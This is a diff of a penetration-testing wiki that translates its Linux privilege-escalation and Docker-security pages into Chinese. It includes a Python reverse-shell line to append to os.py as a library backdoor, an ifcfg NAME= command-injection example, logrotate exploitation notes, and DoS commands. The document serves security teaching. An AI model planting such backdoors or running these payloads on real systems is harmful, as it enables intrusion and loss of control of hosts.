+如果您知道**从哪里**将要执行python脚本,并且您**可以在**该文件夹中写入或**修改python库**,您可以修改OS库并进行后门(如果您可以写入python脚本将要执行的位置,请复制并粘贴os.py库)。 +要**为库添加后门**,只需在os.py库的末尾添加以下行(更改IP和端口): ```python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.14",5678));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); ``` +### Logrotate 利用 -### Logrotate exploitation - -A vulnerability in `logrotate` lets users with **write permissions** on a log file or its parent directories potentially gain escalated privileges. This is because `logrotate`, often running as **root**, can be manipulated to execute arbitrary files, especially in directories like _**/etc/bash_completion.d/**_. It's important to check permissions not just in _/var/log_ but also in any directory where log rotation is applied. +`logrotate` 中的一个漏洞允许对日志文件或其父目录具有 **写权限** 的用户潜在地获得提升的权限。这是因为 `logrotate` 通常以 **root** 身份运行,可以被操控以执行任意文件,特别是在像 _**/etc/bash_completion.d/**_ 这样的目录中。重要的是要检查 _/var/log_ 中的权限,也要检查应用日志轮换的任何目录。 > [!NOTE] -> This vulnerability affects `logrotate` version `3.18.0` and older +> 此漏洞影响 `logrotate` 版本 `3.18.0` 及更早版本 -More detailed information about the vulnerability can be found on this page: [https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition). +有关该漏洞的更多详细信息,请访问此页面:[https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition](https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition)。 -You can exploit this vulnerability with [**logrotten**](https://github.com/whotwagner/logrotten). +您可以使用 [**logrotten**](https://github.com/whotwagner/logrotten) 利用此漏洞。 -This vulnerability is very similar to [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx logs),** so whenever you find that you can alter logs, check who is managing those logs and check if you can escalate privileges substituting the logs by symlinks. +此漏洞与 [**CVE-2016-1247**](https://www.cvedetails.com/cve/CVE-2016-1247/) **(nginx 日志)** 非常相似,因此每当您发现可以更改日志时,请检查谁在管理这些日志,并检查是否可以通过符号链接提升权限。 ### /etc/sysconfig/network-scripts/ (Centos/Redhat) -**Vulnerability reference:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) +**漏洞参考:** [**https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f**](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) -If, for whatever reason, a user is able to **write** an `ifcf-` script to _/etc/sysconfig/network-scripts_ **or** it can **adjust** an existing one, then your **system is pwned**. +如果出于某种原因,用户能够 **写入** 一个 `ifcf-` 脚本到 _/etc/sysconfig/network-scripts_ **或** 可以 **调整** 一个现有的脚本,那么您的 **系统就被攻陷了**。 -Network scripts, _ifcg-eth0_ for example are used for network connections. They look exactly like .INI files. However, they are \~sourced\~ on Linux by Network Manager (dispatcher.d). +网络脚本,例如 _ifcg-eth0_ 用于网络连接。它们看起来与 .INI 文件完全相同。然而,它们在 Linux 中由网络管理器(dispatcher.d)\~sourced\~。 -In my case, the `NAME=` attributed in these network scripts is not handled correctly. If you have **white/blank space in the name the system tries to execute the part after the white/blank space**. This means that **everything after the first blank space is executed as root**. - -For example: _/etc/sysconfig/network-scripts/ifcfg-1337_ +在我的案例中,这些网络脚本中的 `NAME=` 属性处理不当。如果您在名称中有 **空格**,系统会尝试执行空格后的部分。这意味着 **第一个空格后的所有内容都以 root 身份执行**。 +例如: _/etc/sysconfig/network-scripts/ifcfg-1337_ ```bash NAME=Network /bin/id ONBOOT=yes DEVICE=eth0 ``` +### **init, init.d, systemd 和 rc.d** -(_Note the blank space between Network and /bin/id_) +目录 `/etc/init.d` 是 **System V init (SysVinit)** 的 **脚本** 的家,**经典的 Linux 服务管理系统**。它包括用于 `启动`、`停止`、`重启`,有时 `重新加载` 服务的脚本。这些可以直接执行或通过在 `/etc/rc?.d/` 中找到的符号链接执行。在 Redhat 系统中,另一个路径是 `/etc/rc.d/init.d`。 -### **init, init.d, systemd, and rc.d** +另一方面,`/etc/init` 与 **Upstart** 相关,这是由 Ubuntu 引入的较新的 **服务管理**,使用配置文件进行服务管理任务。尽管已经过渡到 Upstart,但由于 Upstart 中的兼容性层,SysVinit 脚本仍与 Upstart 配置一起使用。 -The directory `/etc/init.d` is home to **scripts** for System V init (SysVinit), the **classic Linux service management system**. It includes scripts to `start`, `stop`, `restart`, and sometimes `reload` services. These can be executed directly or through symbolic links found in `/etc/rc?.d/`. An alternative path in Redhat systems is `/etc/rc.d/init.d`. +**systemd** 作为现代初始化和服务管理器出现,提供了高级功能,如按需守护进程启动、自动挂载管理和系统状态快照。它将文件组织到 `/usr/lib/systemd/` 以供分发包使用,并将 `/etc/systemd/system/` 用于管理员修改,从而简化了系统管理过程。 -On the other hand, `/etc/init` is associated with **Upstart**, a newer **service management** introduced by Ubuntu, using configuration files for service management tasks. Despite the transition to Upstart, SysVinit scripts are still utilized alongside Upstart configurations due to a compatibility layer in Upstart. +## 其他技巧 -**systemd** emerges as a modern initialization and service manager, offering advanced features such as on-demand daemon starting, automount management, and system state snapshots. It organizes files into `/usr/lib/systemd/` for distribution packages and `/etc/systemd/system/` for administrator modifications, streamlining the system administration process. - -## Other Tricks - -### NFS Privilege escalation +### NFS 权限提升 {{#ref}} nfs-no_root_squash-misconfiguration-pe.md {{#endref}} -### Escaping from restricted Shells +### 从受限 Shell 中逃逸 {{#ref}} escaping-from-limited-bash.md @@ -1610,31 +1378,31 @@ escaping-from-limited-bash.md cisco-vmanage.md {{#endref}} -## Kernel Security Protections +## 内核安全保护 - [https://github.com/a13xp0p0v/kconfig-hardened-check](https://github.com/a13xp0p0v/kconfig-hardened-check) - [https://github.com/a13xp0p0v/linux-kernel-defence-map](https://github.com/a13xp0p0v/linux-kernel-defence-map) -## More help +## 更多帮助 -[Static impacket binaries](https://github.com/ropnop/impacket_static_binaries) +[静态 impacket 二进制文件](https://github.com/ropnop/impacket_static_binaries) -## Linux/Unix Privesc Tools +## Linux/Unix 权限提升工具 -### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) +### **查找 Linux 本地权限提升向量的最佳工具:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) -**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t option)\ +**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)(-t 选项)\ **Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)\ -**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ -**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ +**Unix 权限检查:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)\ +**Linux 权限检查器:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)\ **BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)\ -**Kernelpop:** Enumerate kernel vulns ins linux and MAC [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ +**Kernelpop:** 在 Linux 和 MAC 中枚举内核漏洞 [https://github.com/spencerdodd/kernelpop](https://github.com/spencerdodd/kernelpop)\ **Mestaploit:** _**multi/recon/local_exploit_suggester**_\ **Linux Exploit Suggester:** [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester)\ -**EvilAbigail (physical access):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ -**Recopilation of more scripts**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) +**EvilAbigail (物理访问):** [https://github.com/GDSSecurity/EvilAbigail](https://github.com/GDSSecurity/EvilAbigail)\ +**更多脚本的汇编**: [https://github.com/1N3/PrivEsc](https://github.com/1N3/PrivEsc) -## References +## 参考文献 - [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)\\ - [https://payatu.com/guide-linux-privilege-escalation/](https://payatu.com/guide-linux-privilege-escalation/)\\ diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md index d48f733d4..35981f069 100644 --- a/src/linux-hardening/privilege-escalation/docker-security/README.md +++ b/src/linux-hardening/privilege-escalation/docker-security/README.md @@ -2,56 +2,45 @@ {{#include ../../../banners/hacktricks-training.md}} -
+## **基本 Docker 引擎安全性** -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %} - -## **Basic Docker Engine Security** - -The **Docker engine** employs the Linux kernel's **Namespaces** and **Cgroups** to isolate containers, offering a basic layer of security. Additional protection is provided through **Capabilities dropping**, **Seccomp**, and **SELinux/AppArmor**, enhancing container isolation. An **auth plugin** can further restrict user actions. +**Docker 引擎** 利用 Linux 内核的 **Namespaces** 和 **Cgroups** 来隔离容器,提供基本的安全层。通过 **Capabilities dropping**、**Seccomp** 和 **SELinux/AppArmor** 提供额外的保护,增强容器隔离。一个 **auth plugin** 可以进一步限制用户操作。 ![Docker Security](https://sreeninet.files.wordpress.com/2016/03/dockersec1.png) -### Secure Access to Docker Engine +### 安全访问 Docker 引擎 -The Docker engine can be accessed either locally via a Unix socket or remotely using HTTP. For remote access, it's essential to employ HTTPS and **TLS** to ensure confidentiality, integrity, and authentication. - -The Docker engine, by default, listens on the Unix socket at `unix:///var/run/docker.sock`. On Ubuntu systems, Docker's startup options are defined in `/etc/default/docker`. To enable remote access to the Docker API and client, expose the Docker daemon over an HTTP socket by adding the following settings: +Docker 引擎可以通过 Unix 套接字本地访问,也可以通过 HTTP 远程访问。对于远程访问,使用 HTTPS 和 **TLS** 确保机密性、完整性和身份验证是至关重要的。 +Docker 引擎默认在 `unix:///var/run/docker.sock` 上监听。在 Ubuntu 系统上,Docker 的启动选项在 `/etc/default/docker` 中定义。要启用对 Docker API 和客户端的远程访问,通过添加以下设置来通过 HTTP 套接字暴露 Docker 守护进程: ```bash DOCKER_OPTS="-D -H unix:///var/run/docker.sock -H tcp://192.168.56.101:2376" sudo service docker restart ``` +然而,由于安全问题,不建议通过 HTTP 暴露 Docker 守护进程。建议使用 HTTPS 来保护连接。保护连接的主要方法有两种: -However, exposing the Docker daemon over HTTP is not recommended due to security concerns. It's advisable to secure connections using HTTPS. There are two main approaches to securing the connection: +1. 客户端验证服务器的身份。 +2. 客户端和服务器相互验证对方的身份。 -1. The client verifies the server's identity. -2. Both the client and server mutually authenticate each other's identity. +证书用于确认服务器的身份。有关这两种方法的详细示例,请参阅 [**此指南**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/)。 -Certificates are utilized to confirm a server's identity. For detailed examples of both methods, refer to [**this guide**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/). +### 容器镜像的安全性 -### Security of Container Images +容器镜像可以存储在私有或公共仓库中。Docker 提供了几种容器镜像的存储选项: -Container images can be stored in either private or public repositories. Docker offers several storage options for container images: +- [**Docker Hub**](https://hub.docker.com): Docker 的公共注册服务。 +- [**Docker Registry**](https://github.com/docker/distribution): 一个开源项目,允许用户托管自己的注册表。 +- [**Docker Trusted Registry**](https://www.docker.com/docker-trusted-registry): Docker 的商业注册表产品,具有基于角色的用户身份验证和与 LDAP 目录服务的集成。 -- [**Docker Hub**](https://hub.docker.com): A public registry service from Docker. -- [**Docker Registry**](https://github.com/docker/distribution): An open-source project allowing users to host their own registry. -- [**Docker Trusted Registry**](https://www.docker.com/docker-trusted-registry): Docker's commercial registry offering, featuring role-based user authentication and integration with LDAP directory services. +### 镜像扫描 -### Image Scanning +容器可能存在 **安全漏洞**,这可能是由于基础镜像或在基础镜像上安装的软件造成的。Docker 正在进行一个名为 **Nautilus** 的项目,该项目对容器进行安全扫描并列出漏洞。Nautilus 通过将每个容器镜像层与漏洞库进行比较来识别安全漏洞。 -Containers can have **security vulnerabilities** either because of the base image or because of the software installed on top of the base image. Docker is working on a project called **Nautilus** that does security scan of Containers and lists the vulnerabilities. Nautilus works by comparing the each Container image layer with vulnerability repository to identify security holes. - -For more [**information read this**](https://docs.docker.com/engine/scan/). +有关更多 [**信息,请阅读此文**](https://docs.docker.com/engine/scan/)。 - **`docker scan`** -The **`docker scan`** command allows you to scan existing Docker images using the image name or ID. For example, run the following command to scan the hello-world image: - +**`docker scan`** 命令允许您使用镜像名称或 ID 扫描现有的 Docker 镜像。例如,运行以下命令以扫描 hello-world 镜像: ```bash docker scan hello-world @@ -67,103 +56,82 @@ Licenses: enabled Note that we do not currently have vulnerability data for your image. ``` - - [**`trivy`**](https://github.com/aquasecurity/trivy) - ```bash trivy -q -f json : ``` - - [**`snyk`**](https://docs.snyk.io/snyk-cli/getting-started-with-the-cli) - ```bash snyk container test --json-file-output= --severity-threshold=high ``` - - [**`clair-scanner`**](https://github.com/arminc/clair-scanner) - ```bash clair-scanner -w example-alpine.yaml --ip YOUR_LOCAL_IP alpine:3.5 ``` +### Docker 镜像签名 -### Docker Image Signing +Docker 镜像签名确保容器中使用的镜像的安全性和完整性。以下是简要说明: -Docker image signing ensures the security and integrity of images used in containers. Here's a condensed explanation: - -- **Docker Content Trust** utilizes the Notary project, based on The Update Framework (TUF), to manage image signing. For more info, see [Notary](https://github.com/docker/notary) and [TUF](https://theupdateframework.github.io). -- To activate Docker content trust, set `export DOCKER_CONTENT_TRUST=1`. This feature is off by default in Docker version 1.10 and later. -- With this feature enabled, only signed images can be downloaded. Initial image push requires setting passphrases for the root and tagging keys, with Docker also supporting Yubikey for enhanced security. More details can be found [here](https://blog.docker.com/2015/11/docker-content-trust-yubikey/). -- Attempting to pull an unsigned image with content trust enabled results in a "No trust data for latest" error. -- For image pushes after the first, Docker asks for the repository key's passphrase to sign the image. - -To back up your private keys, use the command: +- **Docker 内容信任** 利用 Notary 项目,基于更新框架 (TUF),来管理镜像签名。有关更多信息,请参见 [Notary](https://github.com/docker/notary) 和 [TUF](https://theupdateframework.github.io)。 +- 要激活 Docker 内容信任,请设置 `export DOCKER_CONTENT_TRUST=1`。此功能在 Docker 版本 1.10 及更高版本中默认关闭。 +- 启用此功能后,仅可以下载签名的镜像。初始镜像推送需要为根密钥和标记密钥设置密码,Docker 还支持 Yubikey 以增强安全性。更多详细信息可以在 [这里](https://blog.docker.com/2015/11/docker-content-trust-yubikey/) 找到。 +- 尝试在启用内容信任的情况下拉取未签名的镜像会导致 "No trust data for latest" 错误。 +- 在第一次之后的镜像推送中,Docker 会要求输入存储库密钥的密码以签署镜像。 +要备份您的私钥,请使用以下命令: ```bash tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private ``` +在切换 Docker 主机时,必须移动根密钥和存储库密钥以维持操作。 -When switching Docker hosts, it's necessary to move the root and repository keys to maintain operations. - ---- - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %} - -## Containers Security Features +## 容器安全特性
-Summary of Container Security Features +容器安全特性摘要 -**Main Process Isolation Features** +**主要进程隔离特性** -In containerized environments, isolating projects and their processes is paramount for security and resource management. Here's a simplified explanation of key concepts: +在容器化环境中,隔离项目及其进程对于安全和资源管理至关重要。以下是关键概念的简化解释: -**Namespaces** +**命名空间** -- **Purpose**: Ensure isolation of resources like processes, network, and filesystems. Particularly in Docker, namespaces keep a container's processes separate from the host and other containers. -- **Usage of `unshare`**: The `unshare` command (or the underlying syscall) is utilized to create new namespaces, providing an added layer of isolation. However, while Kubernetes doesn't inherently block this, Docker does. -- **Limitation**: Creating new namespaces doesn't allow a process to revert to the host's default namespaces. To penetrate the host namespaces, one would typically require access to the host's `/proc` directory, using `nsenter` for entry. +- **目的**:确保进程、网络和文件系统等资源的隔离。特别是在 Docker 中,命名空间使容器的进程与主机和其他容器分开。 +- **`unshare` 的使用**:`unshare` 命令(或底层系统调用)用于创建新的命名空间,提供额外的隔离层。然而,虽然 Kubernetes 本身并不阻止这一点,但 Docker 确实会。 +- **限制**:创建新命名空间并不允许进程恢复到主机的默认命名空间。要穿透主机命名空间,通常需要访问主机的 `/proc` 目录,使用 `nsenter` 进行进入。 -**Control Groups (CGroups)** +**控制组 (CGroups)** -- **Function**: Primarily used for allocating resources among processes. -- **Security Aspect**: CGroups themselves don't offer isolation security, except for the `release_agent` feature, which, if misconfigured, could potentially be exploited for unauthorized access. +- **功能**:主要用于在进程之间分配资源。 +- **安全方面**:CGroups 本身不提供隔离安全,除了 `release_agent` 特性,如果配置错误,可能会被利用进行未经授权的访问。 -**Capability Drop** +**能力丢弃** -- **Importance**: It's a crucial security feature for process isolation. -- **Functionality**: It restricts the actions a root process can perform by dropping certain capabilities. Even if a process runs with root privileges, lacking the necessary capabilities prevents it from executing privileged actions, as the syscalls will fail due to insufficient permissions. - -These are the **remaining capabilities** after the process drop the others: +- **重要性**:这是进程隔离的重要安全特性。 +- **功能**:通过丢弃某些能力来限制根进程可以执行的操作。即使进程以根权限运行,缺乏必要的能力也会阻止其执行特权操作,因为系统调用将因权限不足而失败。 +这些是进程丢弃其他能力后的 **剩余能力**: ``` Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep ``` - **Seccomp** -It's enabled by default in Docker. It helps to **limit even more the syscalls** that the process can call.\ -The **default Docker Seccomp profile** can be found in [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) +它在 Docker 中默认启用。它有助于**进一步限制进程可以调用的系统调用**。\ +**默认的 Docker Seccomp 配置文件**可以在 [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) 找到。 **AppArmor** -Docker has a template that you can activate: [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) +Docker 有一个可以激活的模板:[https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) -This will allow to reduce capabilities, syscalls, access to files and folders... +这将允许减少能力、系统调用、对文件和文件夹的访问...
### Namespaces -**Namespaces** are a feature of the Linux kernel that **partitions kernel resources** such that one set of **processes** **sees** one set of **resources** while **another** set of **processes** sees a **different** set of resources. The feature works by having the same namespace for a set of resources and processes, but those namespaces refer to distinct resources. Resources may exist in multiple spaces. +**Namespaces** 是 Linux 内核的一个特性,它**将内核资源进行分区**,使得一组**进程****看到**一组**资源**,而**另一**组**进程**看到**不同**的资源集。该特性通过为一组资源和进程使用相同的命名空间来工作,但这些命名空间指向不同的资源。资源可以存在于多个空间中。 -Docker makes use of the following Linux kernel Namespaces to achieve Container isolation: +Docker 利用以下 Linux 内核命名空间来实现容器隔离: - pid namespace - mount namespace @@ -171,7 +139,7 @@ Docker makes use of the following Linux kernel Namespaces to achieve Container i - ipc namespace - UTS namespace -For **more information about the namespaces** check the following page: +有关命名空间的**更多信息**,请查看以下页面: {{#ref}} namespaces/ @@ -179,62 +147,58 @@ namespaces/ ### cgroups -Linux kernel feature **cgroups** provides capability to **restrict resources like cpu, memory, io, network bandwidth among** a set of processes. Docker allows to create Containers using cgroup feature which allows for resource control for the specific Container.\ -Following is a Container created with user space memory limited to 500m, kernel memory limited to 50m, cpu share to 512, blkioweight to 400. CPU share is a ratio that controls Container’s CPU usage. It has a default value of 1024 and range between 0 and 1024. If three Containers have the same CPU share of 1024, each Container can take upto 33% of CPU in case of CPU resource contention. blkio-weight is a ratio that controls Container’s IO. It has a default value of 500 and range between 10 and 1000. - +Linux 内核特性**cgroups**提供了**限制资源如 CPU、内存、IO、网络带宽**等的能力,适用于一组进程。Docker 允许使用 cgroup 特性创建容器,从而实现对特定容器的资源控制。\ +以下是一个用户空间内存限制为 500m,内核内存限制为 50m,CPU 共享为 512,blkio-weight 为 400 的容器。CPU 共享是控制容器 CPU 使用的比例。它的默认值为 1024,范围在 0 到 1024 之间。如果三个容器的 CPU 共享均为 1024,则在 CPU 资源争用的情况下,每个容器最多可以占用 33% 的 CPU。blkio-weight 是控制容器 IO 的比例。它的默认值为 500,范围在 10 到 1000 之间。 ``` docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash ``` - -To get the cgroup of a container you can do: - +要获取容器的 cgroup,您可以执行: ```bash docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container ps -ef | grep 1234 #Get info about the sleep process ls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) ``` - -For more information check: +有关更多信息,请查看: {{#ref}} cgroups.md {{#endref}} -### Capabilities +### 能力 -Capabilities allow **finer control for the capabilities that can be allowed** for root user. Docker uses the Linux kernel capability feature to **limit the operations that can be done inside a Container** irrespective of the type of user. +能力允许**对可以允许的根用户能力进行更细粒度的控制**。Docker使用Linux内核能力特性来**限制可以在容器内执行的操作**,无论用户类型如何。 -When a docker container is run, the **process drops sensitive capabilities that the proccess could use to escape from the isolation**. This try to assure that the proccess won't be able to perform sensitive actions and escape: +当运行docker容器时,**进程会放弃敏感能力,以防止进程逃离隔离**。这试图确保进程无法执行敏感操作并逃脱: {{#ref}} ../linux-capabilities.md {{#endref}} -### Seccomp in Docker +### Docker中的Seccomp -This is a security feature that allows Docker to **limit the syscalls** that can be used inside the container: +这是一项安全特性,允许Docker**限制可以在容器内使用的系统调用**: {{#ref}} seccomp.md {{#endref}} -### AppArmor in Docker +### Docker中的AppArmor -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**.: +**AppArmor**是一个内核增强,用于将**容器**限制在**有限**的**资源**集内,并具有**每个程序的配置文件**: {{#ref}} apparmor.md {{#endref}} -### SELinux in Docker +### Docker中的SELinux -- **Labeling System**: SELinux assigns a unique label to every process and filesystem object. -- **Policy Enforcement**: It enforces security policies that define what actions a process label can perform on other labels within the system. -- **Container Process Labels**: When container engines initiate container processes, they are typically assigned a confined SELinux label, commonly `container_t`. -- **File Labeling within Containers**: Files within the container are usually labeled as `container_file_t`. -- **Policy Rules**: The SELinux policy primarily ensures that processes with the `container_t` label can only interact (read, write, execute) with files labeled as `container_file_t`. +- **标记系统**:SELinux为每个进程和文件系统对象分配一个唯一的标签。 +- **策略执行**:它执行定义进程标签可以对系统内其他标签执行哪些操作的安全策略。 +- **容器进程标签**:当容器引擎启动容器进程时,通常会分配一个受限的SELinux标签,通常为`container_t`。 +- **容器内文件标记**:容器内的文件通常标记为`container_file_t`。 +- **策略规则**:SELinux策略主要确保具有`container_t`标签的进程只能与标记为`container_file_t`的文件进行交互(读取、写入、执行)。 -This mechanism ensures that even if a process within a container is compromised, it's confined to interacting only with objects that have the corresponding labels, significantly limiting the potential damage from such compromises. +该机制确保即使容器内的进程被攻陷,它也仅限于与具有相应标签的对象进行交互,从而显著限制此类攻陷可能造成的损害。 {{#ref}} ../selinux.md @@ -242,23 +206,22 @@ This mechanism ensures that even if a process within a container is compromised, ### AuthZ & AuthN -In Docker, an authorization plugin plays a crucial role in security by deciding whether to allow or block requests to the Docker daemon. This decision is made by examining two key contexts: +在Docker中,授权插件在安全性中发挥着关键作用,通过决定是否允许或阻止对Docker守护进程的请求来实现。这一决定是通过检查两个关键上下文来做出的: -- **Authentication Context**: This includes comprehensive information about the user, such as who they are and how they've authenticated themselves. -- **Command Context**: This comprises all pertinent data related to the request being made. +- **身份验证上下文**:这包括有关用户的全面信息,例如他们是谁以及他们如何进行身份验证。 +- **命令上下文**:这包括与所发出请求相关的所有相关数据。 -These contexts help ensure that only legitimate requests from authenticated users are processed, enhancing the security of Docker operations. +这些上下文有助于确保只有经过身份验证的用户的合法请求被处理,从而增强Docker操作的安全性。 {{#ref}} authz-and-authn-docker-access-authorization-plugin.md {{#endref}} -## DoS from a container +## 来自容器的DoS -If you are not properly limiting the resources a container can use, a compromised container could DoS the host where it's running. +如果您没有正确限制容器可以使用的资源,则被攻陷的容器可能会对其运行的主机造成DoS。 - CPU DoS - ```bash # stress-ng sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t 5m @@ -266,18 +229,15 @@ sudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t # While loop docker run -d --name malicious-container -c 512 busybox sh -c 'while true; do :; done' ``` - -- Bandwidth DoS - +- 带宽 DoS ```bash nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; done ``` +## 有趣的 Docker 标志 -## Interesting Docker Flags +### --privileged 标志 -### --privileged flag - -In the following page you can learn **what does the `--privileged` flag imply**: +在以下页面中,您可以了解 **`--privileged` 标志的含义**: {{#ref}} docker-privileged.md @@ -287,16 +247,13 @@ docker-privileged.md #### no-new-privileges -If you are running a container where an attacker manages to get access as a low privilege user. If you have a **miss-configured suid binary**, the attacker may abuse it and **escalate privileges inside** the container. Which, may allow him to escape from it. - -Running the container with the **`no-new-privileges`** option enabled will **prevent this kind of privilege escalation**. +如果您正在运行一个容器,攻击者设法以低权限用户身份获得访问权限。如果您有一个 **配置错误的 suid 二进制文件**,攻击者可能会滥用它并 **在容器内提升权限**。这可能允许他逃离容器。 +启用 **`no-new-privileges`** 选项运行容器将 **防止这种权限提升**。 ``` docker run -it --security-opt=no-new-privileges:true nonewpriv ``` - -#### Other - +#### 其他 ```bash #You can manually add/drop capabilities with --cap-add @@ -311,101 +268,96 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv # You can manually disable selinux in docker with --security-opt label:disable ``` +对于更多 **`--security-opt`** 选项,请查看: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) -For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration) +## 其他安全考虑 -## Other Security Considerations +### 管理机密:最佳实践 -### Managing Secrets: Best Practices +避免直接在 Docker 镜像中嵌入机密或使用环境变量至关重要,因为这些方法会通过 `docker inspect` 或 `exec` 等命令将您的敏感信息暴露给任何可以访问容器的人。 -It's crucial to avoid embedding secrets directly in Docker images or using environment variables, as these methods expose your sensitive information to anyone with access to the container through commands like `docker inspect` or `exec`. +**Docker 卷** 是一种更安全的替代方案,推荐用于访问敏感信息。它们可以作为内存中的临时文件系统使用,从而降低与 `docker inspect` 和日志记录相关的风险。然而,根用户和具有 `exec` 访问权限的用户仍然可能访问这些机密。 -**Docker volumes** are a safer alternative, recommended for accessing sensitive information. They can be utilized as a temporary filesystem in memory, mitigating the risks associated with `docker inspect` and logging. However, root users and those with `exec` access to the container might still access the secrets. +**Docker secrets** 提供了一种更安全的方法来处理敏感信息。对于在镜像构建阶段需要机密的实例,**BuildKit** 提供了一种高效的解决方案,支持构建时机密,提升构建速度并提供额外功能。 -**Docker secrets** offer an even more secure method for handling sensitive information. For instances requiring secrets during the image build phase, **BuildKit** presents an efficient solution with support for build-time secrets, enhancing build speed and providing additional features. +要利用 BuildKit,可以通过三种方式激活: -To leverage BuildKit, it can be activated in three ways: - -1. Through an environment variable: `export DOCKER_BUILDKIT=1` -2. By prefixing commands: `DOCKER_BUILDKIT=1 docker build .` -3. By enabling it by default in the Docker configuration: `{ "features": { "buildkit": true } }`, followed by a Docker restart. - -BuildKit allows for the use of build-time secrets with the `--secret` option, ensuring these secrets are not included in the image build cache or the final image, using a command like: +1. 通过环境变量: `export DOCKER_BUILDKIT=1` +2. 通过命令前缀: `DOCKER_BUILDKIT=1 docker build .` +3. 通过在 Docker 配置中默认启用: `{ "features": { "buildkit": true } }`,然后重启 Docker。 +BuildKit 允许使用 `--secret` 选项来处理构建时机密,确保这些机密不会包含在镜像构建缓存或最终镜像中,使用命令如下: ```bash docker build --secret my_key=my_value ,src=path/to/my_secret_file . ``` - -For secrets needed in a running container, **Docker Compose and Kubernetes** offer robust solutions. Docker Compose utilizes a `secrets` key in the service definition for specifying secret files, as shown in a `docker-compose.yml` example: - +对于运行中的容器所需的秘密,**Docker Compose 和 Kubernetes** 提供了强大的解决方案。Docker Compose 在服务定义中使用 `secrets` 键来指定秘密文件,如 `docker-compose.yml` 示例所示: ```yaml version: "3.7" services: - my_service: - image: centos:7 - entrypoint: "cat /run/secrets/my_secret" - secrets: - - my_secret +my_service: +image: centos:7 +entrypoint: "cat /run/secrets/my_secret" secrets: - my_secret: - file: ./my_secret_file.txt +- my_secret +secrets: +my_secret: +file: ./my_secret_file.txt ``` 